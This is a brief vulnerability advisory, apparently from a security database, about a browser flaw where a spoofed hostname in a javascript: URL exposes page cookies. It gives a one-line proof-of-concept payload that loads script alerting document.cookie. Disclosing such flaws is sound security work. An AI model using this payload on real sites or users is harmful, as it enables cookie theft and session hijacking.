It's possible to obtain cookie by spoofing valid hostname in javascript: URL. For example f.location = "javascript://www.google.com/\n"+ "'<body onload=alert(document.cookie)>'";
vulners.com/securityvulns/securityvulns:doc:3256